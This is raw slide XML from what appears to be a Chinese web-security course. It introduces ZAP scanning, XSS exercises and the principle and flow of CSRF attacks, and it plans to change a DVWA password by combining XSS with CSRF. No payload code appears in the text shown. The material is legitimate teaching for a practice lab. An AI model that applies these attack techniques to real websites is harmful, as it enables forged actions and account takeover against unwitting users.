              <a:t>在自动检测中，ZAP使用爬虫抓取被测站点的所有页面，在页面抓取的过程中被动扫描所有获得的页面，抓取完毕后，用主动扫描的方式分析页面的功能和参数。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>自动检测结束后，检测结果为被测站点地图及页面资源，所有请求、反馈记录，安全性风险项目列表。</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标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>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任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</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17272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6 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本漏洞</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成High级别的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>型XSS攻击分析。</a:t>
            </a:r>
            <a:endParaRPr sz="240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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成Medium级别的DOM型XSS攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2"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07</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.7 CSRF</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漏洞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0">
    <p:random/>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45" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14845"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pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:sym typeface="+mn-ea"/>
                  </a:rPr>
                  <a:t>任务描述</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:sym typeface="+mn-ea"/>
                </a:endParaRPr>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pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:sym typeface="+mn-ea"/>
                  </a:rPr>
                  <a:t>任务</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13873" y="6880"/>
                <a:ext cx="1644"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pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:sym typeface="+mn-ea"/>
                  </a:rPr>
                  <a:t>任务</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>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
        <p:nvSpPr>
          <p:cNvPr id="51" name="文本框 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3244850"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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理解CSRF漏洞的原理。</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掌握CSRF漏洞的利用。</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了解CSRF漏洞的防御措施。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【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="3262630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>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lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>CSRF，全称 Cross-site request forgery，就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作（如转账、改密等）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>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lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接利用，因此被认为CSRF比XSS更具危险性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>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lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>本任务介绍CSRF攻击、分析CSRF漏洞代码，讲解CSRF漏洞的利用方法，介绍防范CSRF漏洞的措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>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00" y="1681200"/>
            <a:ext cx="10800000" cy="5095240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Web应用系统通过会话ID来认定Web访问请求是否来自合法用户，这样的认证机制存在漏洞，即攻击者如果冒充合法用户发起Web访问请求，Web应用系统则无法甄别该请求的合法性。CSRF攻击正是利用这一特性，通过社会工程学的欺骗攻击，冒充合法用户发起Web访问请求（浏览器访问同一站点会自动附带所有相关的Cookie，会话ID通常设置为一个Cookie值），从而实施网络攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a: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1150620" y="2005050"/>
            <a:ext cx="9578975" cy="3303905"/>
            <a:chOff x="1866" y="3519"/>
            <a:chExt cx="15085" cy="5203"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13379" y="6077"/>
              <a:ext cx="3572" cy="2246"/>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600" b="1"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Web服务器B</a:t>
              </a:r>
              <a:endPar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algn="just"/>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="100">
                  <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>攻击者</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>（发起攻击站点）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="文本框 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1866" y="3519"/>
              <a:ext cx="3514" cy="4804"/>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600" b="1" kern="100">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>客户机</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                <a:latin typeface="+mn-ea"/>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ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" kern="100">
                  <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>用户</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" kern="100">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13379" y="3578"/>
              <a:ext cx="3572" cy="2246"/>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600" b="1" kern="100">
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>Web服务器A</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just"/>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="100">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="100">
                  <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>Web应用系统</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" kern="100">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" kern="100">
                  <a:latin typeface="+mj-ea"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
                </a:rPr>
                <a:t>（被攻击站点）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" kern="100">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="100">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="肘形连接符 21"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="35" idx="2"/>
              <a:endCxn id="37" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="8476" y="-152"/>
              <a:ext cx="3622" cy="13328"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -10353"/>
                <a:gd name="adj2" fmla="val 102811"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="5670" y="3626"/>
              <a:ext cx="7370" cy="5097"/>
              <a:chOff x="777" y="6387"/>
              <a:chExt cx="4226" cy="3089"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="文本框 10"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777" y="6387"/>
                <a:ext cx="4226" cy="302"/>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1.</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登录</a:t>
                </a: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Web</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应用系统</a:t>
                </a:r>
                <a:endPar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41" name="文本框 18"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777" y="7066"/>
                <a:ext cx="4226" cy="271"/>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2.给用户一个Cookie</a:t>
                </a:r>
                <a:endPar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42" name="文本框 19"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777" y="7620"/>
                <a:ext cx="4226" cy="53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3.</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访问</a:t>
                </a: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Web</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应用系统后，在</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没有关闭浏览器的情况下</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，再</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去访问</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恶意</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页面</a:t>
                </a:r>
                <a:endPar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43" name="文本框 20"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777" y="8421"/>
                <a:ext cx="4226" cy="248"/>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4.</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偷偷让用户访问</a:t>
                </a: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Web</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应用系统做</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恶意攻击</a:t>
                </a:r>
                <a:endPar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45" name="文本框 22"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="777" y="8931"/>
                <a:ext cx="4226" cy="545"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350">
                <a:noFill/>
              </a:ln>
              <a:extLst>
                <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                  <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                  </a14:hiddenFill>
                </a:ext>
              </a:ex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5. </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用户不知情的状态下在</a:t>
                </a:r>
                <a:r>
                  <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Web</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应用系统中执行</a:t>
                </a:r>
                <a:r>
                  <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恶意攻击</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN"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rPr>
                  <a:t>操作</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US"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a:p>
                <a:pPr algn="just"/>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="10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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="4" name="直接箭头连接符 3"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5422" y="4087"/>
              <a:ext cx="7958" cy="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custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5422" y="6519"/>
              <a:ext cx="7960" cy="1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custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5427" y="5217"/>
              <a:ext cx="7958" cy="46"/>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custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5426" y="7465"/>
              <a:ext cx="7960" cy="17"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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5137200" y="5655310"/>
            <a:ext cx="1929765" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90170" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="ctr" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="0" checksum="3407529306"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="1940560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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我们将利用CSRF漏洞来修改DVWA平台的密码。我们将利用high级别的DOM XSS与high级别的CSRF结合来修改DVWA平台的密码。本节的学习任务分为两部分：</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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一、low级别的CSRF漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、分析medium、high和impossible级别的CSRF源代码</a:t>
            </a:r>
